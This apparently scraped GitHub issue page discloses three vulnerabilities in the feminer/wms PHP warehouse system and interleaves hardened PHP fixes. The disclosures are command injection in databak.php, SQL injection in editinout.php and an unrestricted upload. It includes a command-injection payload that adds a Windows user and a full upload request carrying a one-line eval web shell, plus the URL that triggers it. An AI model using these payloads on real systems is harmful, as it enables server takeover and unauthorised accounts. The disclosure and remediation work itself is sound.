feminer / wms
Enterprise warehouse management system
License: MIT License
Goods information management
Returned message: This site has no goods yet!
Can it be used directly? The design looks quite detailed.
Command execution
1.1
Windows Server 2012
PHP 5.5.38
Apache 2.4
Mysql 5.6
During installation, use the db_wms_2013_12_31_15_48_34.sql file in the \system\ directory.
In the /system/databak.php file, the parameter filename is received through $_POST and is not filtered; it is passed into the exec function, resulting in a command execution vulnerability.
There is no echo here, so let's test by adding a system user.
payload: filename=1 || net user test /add
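A hardened version of the databak.php pattern the report describes, added here as an example (it is not code from the feminer/wms project). The backup directory, the dump command and the credentials file path are assumptions; the point is that the POST value is checked against a strict allow-list and never spliced into the command line unquoted:

```php
<?php
// Added example, not code from the feminer/wms project: a hardened version of the
// databak.php pattern the report describes (POST "filename" reaching exec()).
// The backup directory, the dump command and the credentials file are assumptions.
declare(strict_types=1);

const BACKUP_DIR = __DIR__ . '/databak';   // assumed location for .sql dumps

/**
 * Return the user-supplied name if it is a plain ".sql" file name, else null.
 * The allow-list admits only letters, digits, "_" and "-" before the suffix, so
 * spaces, "|", "&", ";", quotes, "/" and "\" never reach the shell.
 */
function validate_backup_filename(string $filename): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}\.sql$/', $filename) === 1 ? $filename : null;
}

/**
 * Run the dump into a validated file name. Returns true on success.
 */
function run_backup(string $rawFilename): bool
{
    $filename = validate_backup_filename($rawFilename);
    if ($filename === null) {
        http_response_code(400);   // reject instead of trying to "clean" the input
        return false;
    }
    $target = BACKUP_DIR . DIRECTORY_SEPARATOR . $filename;

    // escapeshellarg() quotes the argument as a second layer even though the
    // allow-list already bans metacharacters; credentials come from a file
    // (placeholder path) so the password is not on the command line.
    $cmd = 'mysqldump --defaults-extra-file=/path/to/backup.cnf db_wms > '
         . escapeshellarg($target);
    exec($cmd, $output, $status);
    return $status === 0;
}

// Vulnerable shape for contrast (illustrative, not the project's actual line):
//   exec('mysqldump ... > ' . $_POST['filename']);
// With that shape a name containing "||" ends the redirection target and starts
// a second command, which is what the report's payload relies on.

// Entry point, as databak.php would use it:
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $ok = run_backup((string) ($_POST['filename'] ?? ''));
    echo $ok ? 'backup written' : 'invalid file name';
}
```

The allow-list is the real control; escapeshellarg() is defence in depth. On Windows (the report's environment) escapeshellarg() wraps the value in double quotes and blanks out embedded quotes and percent signs, so it is not a substitute for the regex. For detection, a process-creation event showing cmd.exe or net.exe spawned by httpd.exe is the signal an administrator would look for.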
SQL injection in http://localhost/wms/src/basic/editinout.php
The GET parameter "id" is passed without filtering to the SQL statement, which causes the vulnerability.
What are the administrator username and password? I only know the username is hust.
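An editinout.php-style lookup with the "id" parameter validated and bound through a prepared statement, added here as an example (not code from the feminer/wms project). The table and column names and the mysqli connection details are assumptions; the project itself uses the legacy mysql_connect() API, as the error message further down this page shows:

```php
<?php
// Added example, not code from the feminer/wms project: an editinout.php-style
// record lookup where the GET parameter "id" is validated and bound with a
// prepared statement. Table and column names and the connection details are
// assumptions.
declare(strict_types=1);

function connect(): mysqli
{
    // Placeholder credentials; the real app keeps its own in conn/conn.php.
    $db = new mysqli('localhost', 'wms_user', 'placeholder-password', 'db_wms');
    $db->set_charset('utf8mb4');
    return $db;
}

/**
 * Fetch one in/out record by id, or null if the id is malformed or unknown.
 */
function fetch_inout_record(mysqli $db, string $rawId): ?array
{
    // Type check first: the id is an integer key, so anything else (quotes,
    // "UNION", comment markers) is rejected before any SQL is built.
    if (!ctype_digit($rawId) || strlen($rawId) > 10) {
        return null;
    }
    $id = (int) $rawId;

    // The SQL text is a constant; the value travels separately as a bound
    // parameter, so it can never change the statement's structure.
    $stmt = $db->prepare('SELECT id, typeid, num, inouttype FROM tb_inout WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Vulnerable shape for contrast (illustrative, not the project's actual line):
//   mysql_query("SELECT * FROM tb_inout WHERE id=" . $_GET['id']);

$record = fetch_inout_record(connect(), (string) ($_GET['id'] ?? ''));
if ($record === null) {
    http_response_code(404);
    exit('record not found');
}
```

The integer check alone would close this particular hole, but binding the value keeps the fix from depending on every caller remembering to cast; on PHP 5.5 the same pattern is available through PDO with PDO::PARAM_INT if mysqlnd is not present.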
Warning: mysql_connect(): Access denied for user 'root'@'localhost' (using password: YES) in D:\phpstudy_pro\WWW\wms\conn\conn.php on line 2
数据库服务器连接错误Access denied for user 'root'@'localhost' (using password: YES)
upfile is the parameter for uploading pictures.
The upfile value from POST is assigned to $upfile.
Then let's look at lines 45-64 of the code.
It can be seen that the uploaded files are stored in the upimages directory, and the file naming rule is 1.jpg, 2.jpg, and so on, incrementing by 1.
POC:
POST /product/savenewproduct.php?flag=1 HTTP/1.1
Host: xxxx
Content-Length: 1507
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wmsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wmsvul.test/product/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695
Connection: close
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="typeid"
0001
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="name"
123123123123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="encode"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="barcode"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="size"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="unit"
None
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upperlimit"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="lowerlimit"
10
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="inprice"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="outprice"
123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upfile"; filename="POC.php"
Content-Type: application/octet-stream
<?php @eval($_GET['ace']);?>
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="jianjie"
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="submit"
添加
------WebKitFormBoundaryONFXfH9gn2T6Gxal--
Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php.
Then we access the PHP file to execute the code.
POC:
http://wmsvul.test/product/upimages/1.php?ace=phpinfo();
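A hardened replacement for the savenewproduct.php upload path the report describes, added here as an example (not code from the feminer/wms project). The upload directory, the size limit and the accepted types are assumptions; the essential changes are that the server sniffs the content, chooses the extension and the file name itself, and never uses the client's filename:

```php
<?php
// Added example, not code from the feminer/wms project: a hardened replacement
// for the savenewproduct.php upload handling the report describes. The upload
// directory, size limit and accepted types are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/upimages';
const MAX_BYTES  = 2000000;   // same value the form sends as MAX_FILE_SIZE
// Server-side map from sniffed MIME type to the extension the server assigns.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Validate one entry of $_FILES and store it under a server-chosen name.
 * Returns the stored file name; throws on any rejection.
 */
function accept_product_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error ' . ($file['error'] ?? 'none'));
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('missing or oversized upload');
    }

    // Never trust $_FILES[...]['type'] or the client file name ("POC.php" in
    // the report): sniff the content on the server instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }

    // The extension comes from the detected type, so whatever the upload was
    // called it is stored as .jpg/.png/.gif, and the name is unguessable
    // rather than the sequential 1.jpg, 2.jpg of the original scheme.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // readable, not executable
    return $name;
}

if (isset($_FILES['upfile'])) {
    try {
        $stored = accept_product_image($_FILES['upfile']);
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
    }
}
```

Content checks are necessary but not sufficient: a file that begins with a valid image header and carries PHP code later in the body passes both finfo and getimagesize(). The server-assigned extension stops it being run as PHP by name, and the upimages directory should additionally be configured so no script is ever executed from it (on the report's Apache 2.4 stack, an .htaccess or httpd.conf block that denies access to .php files in that directory, or turns the PHP engine off for it). Storing uploads outside the web root and serving them through a read-only handler removes the problem entirely.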
Hey there!
I belong to an open source security research community, and a member (@wtwver) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)